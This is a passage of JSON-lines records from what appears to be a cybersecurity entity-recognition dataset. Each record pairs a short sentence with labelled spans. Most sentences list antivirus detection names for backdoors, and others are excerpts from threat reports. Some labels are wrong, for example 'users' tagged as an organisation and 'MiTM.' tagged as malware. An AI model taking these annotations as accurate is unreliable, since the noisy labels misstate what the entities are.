targeting banks": [[111, 126]], "ORGANIZATION: casinos": [[181, 188]], "SYSTEM: international online payment systems.": [[193, 230]]}, "info": {"id": "cyner2_train_005396", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zusy.D22B33 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Hijacker.evkwtm Trojan.DownLoader25.54001 Trojan.Win32.Pastraw Trojan:Win32/Nibagem.A Trojan/Win32.Asprox.C718808 SScope.Backdoor.Sdbot W32/Pastraw.A!tr Win32/Trojan.d54", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005398", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.YakesCS.S1573857 Trojan.Ransom.Sage Trojan.Filecoder.Win32.6418 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.HXTV-7683 Ransom.Cry!g2 Trojan.Win32.Filecoder.etsgeu TrojWare.Win32.Filecoder.GT Trojan.DownLoader25.46287 BehavesLike.Win32.Downloader.gc Trojan.Yakes.xat TR/Crypt.ZPACK.hzbag Trojan.Win32.Sage.442368 Trojan.Yakes Ransom.FileCryptor Win32/Filecoder.NHQ Trojan.Yakes!0Hl2Fx4Uudk", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005400", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9912 Backdoor:Win32/Ptiger.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005401", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Vreikstadi Trojan.Win32.Inject.evlgqj Trojan.Win32.Injector W32/Trojan.HMUN-3172 TR/Injector.avgqa Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005402", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.LogoOneR.PE Worm.Win32.Viking!O W32/HLLP.Philis.ba Worm.Viking.Win32.8 Trojan/PSW.Delf.qo Win32.Worm.Viking.a W32/PWStealer.AOC W32.Looked.P PE_LOOKED.FX Win.Spyware.11941-2 Worm.Win32.Viking.mi Trojan.Win32.Viking.btggzy Worm.Win32.Viking.49152 Worm.Win32.Viking.ae Win32.Viking.AT~clean Win32.HLLW.Gavir.93 PE_LOOKED.FX 
BehavesLike.Win32.HLLPPhilis.dz Worm.Win32.Viking Worm/Viking.el Worm/Win32.Viking.mi Win32.Viking.av.49152 Virus:Win32/Viking.JB Backdoor.W32.Bifrose.lz9q Worm.Win32.Viking.mi MalwareScope.Worm.Viking.4 Win32/Viking.AT Worm.Viking.FP W32/Viking.WH.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005404", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader.Sherlol.A Trojan-Downloader/W32.Sherlol.4608 Trojan/StartPage.cj Trojan.Downloader.Sherlol.A Trojan.DL.Sherlol!c8F6ghXOM0o Win32/TrojanDownloader.Sherlol Trojan-Downloader.Win32.Sherlol Trojan.Win32.Sherlol.dngr Trojan.Win32.Downloader.4608.EN[h] Trojan.Downloader.Sherlol.A TrojWare.Win32.TrojanDownloader.Sherlol Trojan.Downloader.Sherlol.A Trojan.DownLoader.4608 Downloader.Sherlol.Win32.3 BehavesLike.Win32.Downloader.xt TrojanDownloader.Satray.k TR/Dldr.Sherlol W32/Sherlol.CJ!tr Trojan[Downloader]/Win32.Sherlol Trojan.Downloader.Sherlol.A Troj.Downloader.W32.Sherlol!c Win-Trojan/Sherlol.4608 Win32/Startpage.CJ!downloader Trojan.Downloader.Sherlol.A Trj/Downloader.CET Trojan.Win32.StartPage Trojan.Downloader.Sherlol.A Downloader.Sherlol.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005406", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Sirefef.FR Trojan.Sirefef.FR Win32.Trojan.Sirefef.b Trojan.Sirefef.FR Trojan.Sirefef.FR BackDoor.Maxplus.5220 BehavesLike.Win64.Ramnit.pt Trojan.Win64 Trojan[Backdoor]/Win64.ZAccess Trojan.Sirefef.FR Trojan:Win64/Sirefef.F Trojan.Sirefef.FR Win64/Sirefef.W", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005408", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.BAT.Starter.bn Bat.Trojan.Starter.Aliq Backdoor:Win32/Teldoor.C Trojan.BAT.Starter.bn Trojan/Win32.Dropper.C406140 Trojan.Horst.0315 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005410", "source": "cyner2_train"}} {"text": "A 
backdoor also known as: Trojan.Symmi.D2391 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Neshgaig-1 BehavesLike.Win32.Worm.gc W32/Trojan.MVJF-1155 Heur:Trojan/PSW.Dnf TrojanDownloader:Win32/Somex.B TrojanSpy.TravNet Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005412", "source": "cyner2_train"}} {"text": "The operation remains active at the time of writing this post, with attacks reported as recently as February 2017.", "spans": {"THREAT_ACTOR: The operation": [[0, 13]]}, "info": {"id": "cyner2_train_005414", "source": "cyner2_train"}} {"text": "The malware authors are currently targeting users of Mexico s second largest bank, Banamex, but it is capable of updating the configuration file to include more financial institutions.", "spans": {"THREAT_ACTOR: The malware authors": [[0, 19]], "ORGANIZATION: users": [[44, 49]], "ORGANIZATION: second largest bank, Banamex,": [[62, 91]], "ORGANIZATION: financial institutions.": [[161, 184]]}, "info": {"id": "cyner2_train_005415", "source": "cyner2_train"}} {"text": "A backdoor targetting Linux also known as: Trojan.Linux.ChinaZ.D Trojan-DDoS.Linux.Znaich.A Trojan.Linux.ChinaZ.D ELF_ZANICH.SMB Trojan.Linux.ChinaZ.D HEUR:Trojan-DDoS.Linux.Znaich.a Trojan.Linux.ChinaZ.D Trojan.Znaich.exfzmb Troj.Ddos.Linux!c Trojan.Linux.ChinaZ.D Trojan.Linux.ChinaZ.D Linux.DDoS.73 Trojan.ChinaZ.Linux.14 ELF_ZANICH.SMB Linux/DDoS-Flood.B ELF/Trojan.ULZK-7 TrojanDDoS.Linux.ax LINUX/ChinaZ.eevfy Trojan[DDoS]/Linux.Znaich.a Trojan.Linux.ChinaZ.D Linux/Ddos.1806356 HEUR:Trojan-DDoS.Linux.Znaich.a Linux/DDoS-Flood.B Trojan.Linux.Znaich.aaac DDOS.Linux.CinaZ Win32/Trojan.9b6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005416", "source": "cyner2_train"}} {"text": "Bartalex is a name that continues to appear in a cyberthief's arsenal as one of the most popular mechanisms for distributing banking Trojans, ransomware, RATs, and other malware.", "spans": {"THREAT_ACTOR: 
cyberthief's arsenal": [[49, 69]], "MALWARE: banking Trojans, ransomware,": [[125, 153]], "MALWARE: RATs,": [[154, 159]], "MALWARE: other malware.": [[164, 178]]}, "info": {"id": "cyner2_train_005418", "source": "cyner2_train"}} {"text": "It is no surprise it's now being used against pro-democracy organizations and supporters in Hong Kong that have long been a target of advanced attack campaigns.", "spans": {"ORGANIZATION: pro-democracy organizations": [[46, 73]], "ORGANIZATION: supporters": [[78, 88]], "THREAT_ACTOR: advanced attack campaigns.": [[134, 160]]}, "info": {"id": "cyner2_train_005419", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGameBTP.Worm Trojan-PWS/W32.WebGame.34816.CL Trojan-GameThief.Win32.OnLineGames!O Trojan.Downloader.E9C186 Win32.Trojan.WisdomEyes.16070401.9500.9991 W32/Pws.AHAF Trojan.Win32.OnLineGames.cwndth Trojan.Win32.Z.Onlinegames.34816.AS Trojan.PWS.Gamania.10257 Trojan.OnLineGames.Win32.121510 Trojan-GameThief.Win32.OnLineGames Trojan/PSW.OnLineGames.aibk Trojan[GameThief]/Win32.OnLineGames Win32.Troj.Downloader.gy.kcloud Trojan/Win32.OnlineGameHack.C55967 W32/OnlineGames.SOI!tr.pws Win32/Trojan.2ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005421", "source": "cyner2_train"}} {"text": "Version 2, also referred to as Globe2, appeared two months later, in October, but both versions were no match for Emsisoft's team, who released free decrypters for both variants shortly after Globe and Globe2 started hitting users.", "spans": {"MALWARE: Version 2,": [[0, 10]], "MALWARE: Globe2,": [[31, 38]], "MALWARE: versions": [[87, 95]], "ORGANIZATION: Emsisoft's team,": [[114, 130]], "MALWARE: variants": [[169, 177]], "MALWARE: Globe": [[192, 197]], "MALWARE: Globe2": [[202, 208]], "ORGANIZATION: users.": [[225, 231]]}, "info": {"id": "cyner2_train_005422", "source": "cyner2_train"}} {"text": "A backdoor also known as: JS:Trojan.JS.Redirector.BS JS.Redirector.DE JS:Trojan.JS.Redirector.BS 
JS/Redir.WI Trojan.Malscript!html JS:Trojan.JS.Redirector.BS JS:Trojan.JS.Redirector.BS Trojan.Script.Expack.drqfka JS:Trojan.JS.Redirector.BS JS:Trojan.JS.Redirector.BS BehavesLike.PDF.Trojan.db JS/Redir.WI TrojanDownloader.JS.aufd JS/Redirector.OA.1 JS:Trojan.JS.Redirector.BS", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005423", "source": "cyner2_train"}} {"text": "A backdoor also known as: TSPY_WHITEICE_BK22015F.TOMC Win32.Worm.WhiteIce.a TSPY_WHITEICE_BK22015F.TOMC Trojan.Win32.WhiteIce.cyctb Win32.Virus.Whiteice.Tcvt Win32.HLLW.Bice.8 BehavesLike.Win32.Trojan.jh Virus.Win32.Whiteice WORM/Darksnow.37953.2 Worm/Win32.WhiteIce.R35142 Worm.WhiteIce Win32/Whiteice.B Worm.WhiteIce!tYiT3Eh27BE Trj/CI.A Virus.Win32.BlackIce.C", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005425", "source": "cyner2_train"}} {"text": "A backdoor also known as: JS/ProxyJack.C1!Eldorado JS.Downloader JS/ProxyChanger.BF BehavesLike.JS.Exploit.mm JS/ProxyJack.C1!Eldorado TrojanProxy:JS/Kovonionz.A JS/Nemucod.io Trojan.JS.ProxyChanger JS/ProxyChanger.BF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005426", "source": "cyner2_train"}} {"text": "The Trojan uses the Windows Management Instrumentation Command-line WMIC to start processes remotely on other Windows computers.", "spans": {"MALWARE: Trojan": [[4, 10]], "SYSTEM: the Windows Management Instrumentation Command-line WMIC": [[16, 72]], "SYSTEM: Windows computers.": [[110, 128]]}, "info": {"id": "cyner2_train_005428", "source": "cyner2_train"}} {"text": "New OSX_DOK.C variant performing MiTM.", "spans": {"MALWARE: MiTM.": [[33, 38]]}, "info": {"id": "cyner2_train_005429", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.SwenA.Worm Worm/W32.Swen.151552 Email-Worm.Win32!O W32.Swen.A W32.W.Swen!c Win32.Trojan.WisdomEyes.16070401.9500.9969 W32/Swen.A@mm W32.Swen.A@mm Win32/Swen.A Win.Worm.Gibe-4 Trojan.Win32.Scar.fcci 
Trojan.Win32.Swen.gicl I-Worm.Win32.Swen.106496 Win32.Trojan.Scar.Wofg Worm.Win32.Swen.A Win32.HLLM.Gibe.2 Worm.Swen.Win32.3 Email-Worm.Win32.Swen W32/Swen.A@mm Trojan/Win32.Scar Trojan.Win32.Scar.fcci Worm:Win32/Swen.A@mm Email-Worm.Win32.Swen W32/Gibe.C.worm I-Worm.Swen.A Win32/Swen.A I-Worm.Swen.A1 W32/Swen.A@mm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005430", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.GekasiK.Trojan Worm.Foler.E5 WORM_SILLY.WXXZLDR Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Hangove WORM_SILLY.WXXZLDR Virus.Win32.Renamer.u ApplicUnwnt.Win32.ArchSMS.DRPA Worm.Renamer.Win32.2 BehavesLike.Win32.Virus.gm Trojan.Win32.Webprefix Virus/Win32.Renamer.u Trojan.Zusy.D15B99 Virus.Win32.Renamer.u Worm:Win32/Foler.C Worm.Win32.Foler.a W32/Foler.A!worm Win32/Worm.b18", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005432", "source": "cyner2_train"}} {"text": "Looking closer at the structure of this attack, we were surprised when we realized this was the infamous Blackhole.", "spans": {"MALWARE: Blackhole.": [[105, 115]]}, "info": {"id": "cyner2_train_005434", "source": "cyner2_train"}} {"text": "In May we also observed an Office 365 credential phishing attack leading to iSpy Keylogger but the combination of OWA with this infection chain takes a different approach.", "spans": {"MALWARE: iSpy Keylogger": [[76, 90]]}, "info": {"id": "cyner2_train_005436", "source": "cyner2_train"}} {"text": "New activity from NewPOSThings and the You Chung actor.", "spans": {"MALWARE: NewPOSThings": [[18, 30]], "THREAT_ACTOR: the You Chung actor.": [[35, 55]]}, "info": {"id": "cyner2_train_005437", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnlineGameNAKSD.Trojan Trojan-Downloader.Win32.VB!O Trojan.VBCrypt.MF.90 Downloader.VB.Win32.66970 Trojan/Downloader.VB.zqs Trojan.Heur.ZGY.5 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan3.BYE Backdoor.Trojan 
Win32/Axespec.C TSPY_ZBOT.BVV Trojan-Downloader.Win32.VB.zqs Trojan.Win32.VB.bcwli Trojan.Win32.Downloader.71680.CE Trojan.Oficla.59 TSPY_ZBOT.BVV BehavesLike.Win32.PWSAxespec.wc Trojan-Ransom.Win32.PornoBlocker TrojanDownloader.VB.dfho PWS:Win32/Axespec.C Troj.Downloader.W32.VB.tnTN Trojan-Downloader.Win32.VB.zqs Trojan/Win32.FakeAV.R51073 PWS-Axespec.f SScope.Trojan.VB.0862 Trojan.Dropper.VB Trojan.Injector.SOC W32/Injector.VOX!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005439", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.VB.bjci Trojan.Win32.VB.bkqmep VBTroj.MYNR Trojan.Win32.VB.bjci Trojan.DL.VB!OZxgAC/E/K8 Trojan.Win32.A.VB.1289216[ASPack] TrojWare.Win32.VB.baur Trojan.DownLoader5.27404 Trojan/Win32.VB W32/Trojan.SXSN-1674 Trojan.VB Trojan-Downloader.VB Downloader.VB.7.BG Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005440", "source": "cyner2_train"}} {"text": "A backdoor also known as: Heur.Corrupt.PE BehavesLike.Win32.Rontokbro.nc TrojanDownloader.Femad.at HackTool[Constructor]/Win32.Bom Constructor:Win32/Bom.7_0.dam#2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005441", "source": "cyner2_train"}} {"text": "Unit 42 has discovered a new malware family we've named Reaver with ties to attackers who use SunOrcal malware.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "MALWARE: a new malware family": [[23, 43]], "MALWARE: Reaver": [[56, 62]], "THREAT_ACTOR: attackers": [[76, 85]], "MALWARE: SunOrcal malware.": [[94, 111]]}, "info": {"id": "cyner2_train_005442", "source": "cyner2_train"}} {"text": "This article will walk through an incident where Tomcat is used and what critical artifacts you should collect.", "spans": {}, "info": {"id": "cyner2_train_005446", "source": "cyner2_train"}} {"text": "Check Point Research's new report on Chinese cyber-espionage attacks against Southeast Asian government entities shows that a previously 
undisclosed toolset used by an APT group has been linked to a new family of malware.", "spans": {"ORGANIZATION: Check Point Research's": [[0, 22]], "THREAT_ACTOR: Chinese cyber-espionage": [[37, 60]], "ORGANIZATION: government": [[93, 103]], "MALWARE: toolset": [[149, 156]], "THREAT_ACTOR: an APT group": [[165, 177]], "MALWARE: malware.": [[213, 221]]}, "info": {"id": "cyner2_train_005450", "source": "cyner2_train"}} {"text": "A backdoor also known as: WORM_RBOT.AS Win32.Trojan.WisdomEyes.16070401.9500.9761 W32/Backdoor2.DNGR Win32/SillyAutorun.AIH WORM_RBOT.AS Packed.Win32.CPEX-based.ht Trojan.Win32.CPEXbased.bregf Trojan.MulDrop.23017 W32/Backdoor.MVUH-2689 Backdoor/VB.nkv Packed.Win32.CPEX-based.ht Trojan/Win32.Xema.R61630", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005451", "source": "cyner2_train"}} {"text": "The actors involved seem to be the same as the ones behind the self sufficient Flash malverts/exploits we've documented before and also reported by security researcher Kafeine Spartan EK.", "spans": {"THREAT_ACTOR: actors": [[4, 10]], "VULNERABILITY: Flash malverts/exploits": [[79, 102]], "ORGANIZATION: security researcher Kafeine": [[148, 175]], "MALWARE: Spartan EK.": [[176, 187]]}, "info": {"id": "cyner2_train_005452", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.NSIS.Miner.SD Trojan.Strictor.D1B5F4 Multi.Threats.InArchive W32/Trojan.RYKP-1781 WORM_CO.331300D2 Win.Trojan.Virtob-1633 Trojan.Win32.CoinMiner.bn Trojan.Win32.BitCoinMiner.ddjqfi AdWare.W32.OneInstaller.lZ9E Win32.Trojan.Miner.Wwen Trojan.BtcMine.1033 WORM_CO.331300D2 BehavesLike.Win32.TrojanCoinMiner.vc Trojan.NSIS.Coinminer W32/Trojan2.OZCV Trojan/PSW.Tepfer.cbjx Trojan/Win32.Miner.ayf Trojan:Win32/CoinMiner.AQ Trojan.Win32.CoinMiner.bn Trojan/Win32.BitCoinMiner.C931392 RiskWare.BitCoinMiner NSIS/CoinMiner.N W32/Miner.AYF!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005453", "source": 
"cyner2_train"}} {"text": "A backdoor also known as: W32.OnlinegameXMQB.Trojan Trojan.FlyStudio.UJ W32/AutoRun.soq Win32.Trojan.FlyStudio.hd W32.SillyFDC Win32/Nuj.AD WORM_FLYSTUDI.B Win.Worm.FlyStudio-23 Trojan.Win32.Crypted.wjgrc Worm.Win32.Autorun.175133 W32.W.AutoRun.l8Zk Trojan.Click2.51706 Worm.AutoRun.Win32.2576 WORM_FLYSTUDI.B BehavesLike.Win32.Autorun.bc Trojan.Win32.FlyStudio Worm/AutoRun.fpz Worm/Win32.FlyStudio Worm:Win32/Regul.B Worm.FlyStudio Trj/FlyStudio.CR Trojan.FlyStudio.NAQ Win32/FlyStudio.NAQ Trojan.Win32.FakeFolder.t", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005455", "source": "cyner2_train"}} {"text": "In this blog entry, we will introduce and analyze the other tools and malware used by Earth Preta.", "spans": {"MALWARE: tools": [[60, 65]], "MALWARE: malware": [[70, 77]], "THREAT_ACTOR: Earth Preta.": [[86, 98]]}, "info": {"id": "cyner2_train_005457", "source": "cyner2_train"}} {"text": "This IP address has been observed attempting to bruteforce SSH server credentials, SSH, which stands for Secure Shell, is a [network protocol]https://null-byte.wonderhowto.com/how-to/networking-basics/ that allows for encrypted communication over an insecure network.", "spans": {"SYSTEM: SSH server": [[59, 69]], "SYSTEM: SSH,": [[83, 87]], "SYSTEM: Secure Shell,": [[105, 118]], "SYSTEM: insecure network.": [[250, 267]]}, "info": {"id": "cyner2_train_005458", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FakeDirC.Worm Win32.Tyhos.A Virus.Win32.Tyhos!O Trojan.Malex.F2 Virus.Tyhos.Win32.4 Win32.Tyhos.A W32.Virut.CF Win32/Tyhos.A Virus.Win32.Tyhos.a Win32.Tyhos.A Trojan.Win32.Tyhos.bdclx Packer.W32.Tibs.l4Hz Trojan.Win32.FakeFolder.mgge Win32.Tyhos.A Win32.Tyhos.A Trojan.Styho BehavesLike.Win32.VirRansom.ph Win32/Virut.bv Virus/Win32.Tyhos.a Worm:Win32/Nestog.A Virus.Win32.Tyhos.a Win32.Tyhos.A HEUR/Fakon.mwf Win32.Tyhos.A Win32.Virut.NAB Win32/Virut.NBP Virus.Win32.Tyhos Trj/Tyghos.A Win32/Virus.4bd", "spans": 
{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005461", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Tapslix RDN/Autorun.worm!e Win32.Trojan.WisdomEyes.16070401.9500.9995 W32/Trojan.PONZ-7153 Trojan.DownLoader5.52616 RDN/Autorun.worm!e Trojan/Win32.Unknown Trojan.Strictor.D4F65 Trojan:Win32/Tapslix.A HEUR/Fakon.mwf Win32.Trojan.Fakedoc.Auto Trojan.CFI!dl5uaEh6TdQ W32/Yoddos.AG!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005462", "source": "cyner2_train"}} {"text": "Operation Black Atlas has already spread to a multi-state healthcare provider, dental clinics, a machine manufacturer, a technology company focusing on insurance services, a gas station that has a multi-state presence, and a beauty supply shop.", "spans": {"THREAT_ACTOR: Operation Black Atlas": [[0, 21]], "ORGANIZATION: multi-state healthcare provider, dental clinics,": [[46, 94]], "ORGANIZATION: machine manufacturer,": [[97, 118]], "ORGANIZATION: technology company focusing on insurance services,": [[121, 171]], "ORGANIZATION: gas station": [[174, 185]], "ORGANIZATION: multi-state presence,": [[197, 218]], "ORGANIZATION: beauty supply shop.": [[225, 244]]}, "info": {"id": "cyner2_train_005466", "source": "cyner2_train"}} {"text": "Within the framework of the analyzes, however, the BSI has not discovered any malicious software; infections are also not known to the BSI.", "spans": {"ORGANIZATION: the BSI": [[47, 54]], "MALWARE: malicious software; infections": [[78, 108]], "ORGANIZATION: the BSI.": [[131, 139]]}, "info": {"id": "cyner2_train_005468", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Death_Packed.439808 BackDoor-FP.cli Backdoor.Death!/0dScPy2Eok Win32/Death.23 W32/Death.C Backdoor.Trojan W32/Death.2_3 Trojan.Win32.Heur.089 Win32.Death.23 Backdoor.Win32.Death.23 Backdoor.Death.23 Backdoor.Win32.Death.23 Backdoor.Death.23 BackDoor.Death.23 TR/Dearh.23.Cli Backdoor.Win32.Death!IK 
Backdoor/Death.23 Backdoor/Win32.Death Backdoor.Win32.Death_23.Client Backdoor.Death.23 W32/Death.C Win-Trojan/Death.439808 Backdoor.Trojan Backdoor.Win32.Death W32/Backdoor.LamersDeath-FP BackDoor.Death Bck/Death.23.I", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005471", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Fareit W32/Injector.GFG Trojan.Win32.Stealer.ewulwv Trojan.Win32.Z.Injector.999936 Trojan.PWS.Stealer.20566 Trojan.Win32.Injector W32/Injector.NZPO-0886 DR/Delphi.pzjjj Trojan[Backdoor]/Win32.Androm Trojan/Win32.Inject.R217517 Backdoor.Androm Trj/CI.A Win32.Trojan.Delf.Swaz W32/Injector.DVFA!tr Win32/Trojan.986", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005473", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Temratanam Trojan.MaskedTeamViewer Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.SCHM-2542 TROJ_GE.52AE4DE2 Backdoor.Win32.TeamBot.cq Trojan.Win32.TeamBot.eutqba BackDoor.TeamViewer.45 TROJ_GE.52AE4DE2 BehavesLike.Win32.Backdoor.tc Backdoor:Win32/Temratanam.A Backdoor.Win32.TeamBot.cq PUP/Win32.StartSurf.R196040 Backdoor.TeamBot Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005474", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.RugoAd.Fam.Trojan TrojanDropper.Purgodoor.A5 TROJ_DROPR.SMD1 Adware.Rugo TROJ_DROPR.SMD1 AdWare.W32.BHO.lhD4 ApplicUnsaf.Win32.AdWare.BHO.AM Trojan.MulDrop1.42303 BehavesLike.Win32.Downloader.gc Adware/MsLock.akh GrayWare[AdWare]/Win32.BHO TrojanDropper:Win32/Purgodoor.A Dropper/Win32.Cadro.R1482 Adware-Rugo.f AdWare.BHO Trj/CI.A Win32.Trojan.Obfuscator.Ajla not-a-virus:AdWare.Win32.BHO Win32/Trojan.b5d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005475", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.InfecDoor.746584 Backdoor.InfecDoor!stFv1Z+nlTE Win32/Infector.20.A Backdoor.Surgeon 
BKDR_INFDOOR20.A Win32.InfecDoor.20.a Trojan.Infector-17 Backdoor.Win32.InfecDoor.20.a Backdoor.Win32.InfecDoor!IK Backdoor.Win32.Infector.20.A BackDoor.Infector.20 BDS/Infect.20.Srv2 BKDR_INFDOOR20.A Win32/Theinf.20.B Backdoor/Infector.20.a Backdoor:Win32/Infector.2_0 Backdoor.Win32.InfecDoor_20 Win-Trojan/Infecdoor.746584 Backdoor.Surgeon Backdoor.Win32.InfecDoor BackDoor.Infector Bck/Infector.20", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005477", "source": "cyner2_train"}} {"text": "We believe the threat actors behind the attack don't use exploit kits and automated installers to instantly compromise and infect victims.", "spans": {"THREAT_ACTOR: threat actors": [[15, 28]], "MALWARE: exploit kits": [[57, 69]]}, "info": {"id": "cyner2_train_005478", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan-Downloader.Small.alkd.3.Pack W32/Downldr3.EY Trojan-Downloader.Win32.Small.aowd Trojan.DownLoad1.37207 TROJ_DOWGAV.SMF Win32/SillyDl.NUS W32/Downldr3.EY TrojanDownloader.Small.aqlm Trojan-Downloader.Win32.Small!IK TrojanDownloader:Win32/Dowgav.A Trojan-Downloader.Win32.Small.aowd Trojan-Downloader.Win32.Small Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005479", "source": "cyner2_train"}} {"text": "Using their advanced toolkit, the Turla group compromise networks for the purposes of intelligence collection.", "spans": {"MALWARE: advanced toolkit,": [[12, 29]], "THREAT_ACTOR: the Turla group": [[30, 45]]}, "info": {"id": "cyner2_train_005481", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zenshirsh.SL7 Packer.W32.Krap.lFn4 Win32.Trojan.WisdomEyes.16070401.9500.9995 TSPY_EMOTET.SMD12 Trojan.Win32.Gozi.euritn BackDoor.Gozi.135 TrojanSpy.Ursnif.afo TR/Crypt.Xpack.ekgur Trojan:Win32/Trriloa.A Trj/CI.A Trojan.Win32.Krypt Win32/Trojan.8ad", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005482", "source": "cyner2_train"}} {"text": "The 
infection vector is a Hangul Word Processor document HWP, a popular alternative to Microsoft Office for South Korean users developed by Hancom.", "spans": {"SYSTEM: Microsoft Office": [[87, 103]], "ORGANIZATION: users": [[121, 126]], "ORGANIZATION: Hancom.": [[140, 147]]}, "info": {"id": "cyner2_train_005483", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 BehavesLike.Win32.Trojan.cc TR/Crypt.ZPACK.oltlq Trojan.Barys.DD8C9 HackTool:Win64/Mimikatz.A Win-Trojan/MSILKrypt02.Exp Trojan.MSIL.Inject MSIL/Injector.QOT!tr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005484", "source": "cyner2_train"}} {"text": "This document likely marks the first observed use of this technique by APT28.", "spans": {"THREAT_ACTOR: APT28.": [[71, 77]]}, "info": {"id": "cyner2_train_005485", "source": "cyner2_train"}} {"text": "The adversaries appear to have evolved their tactics and techniques throughout the tracked time-period, iterating through a diverse toolset across different waves of attacks.", "spans": {"THREAT_ACTOR: adversaries": [[4, 15]], "MALWARE: toolset": [[132, 139]]}, "info": {"id": "cyner2_train_005486", "source": "cyner2_train"}} {"text": "A day before the controversial United States Presidential elections, an email was distributed to inform the recipients of a possible attack during election day as mentioned in a manifesto, allegedly from the ISIS terrorist group, entitled The Murtadd Vote", "spans": {"ORGANIZATION: Presidential elections,": [[45, 68]], "ORGANIZATION: recipients": [[108, 118]], "THREAT_ACTOR: ISIS terrorist group,": [[208, 229]]}, "info": {"id": "cyner2_train_005487", "source": "cyner2_train"}} {"text": "The C2 backend url looks like this : https : //evilhost/c2folder/njs2/ ? 
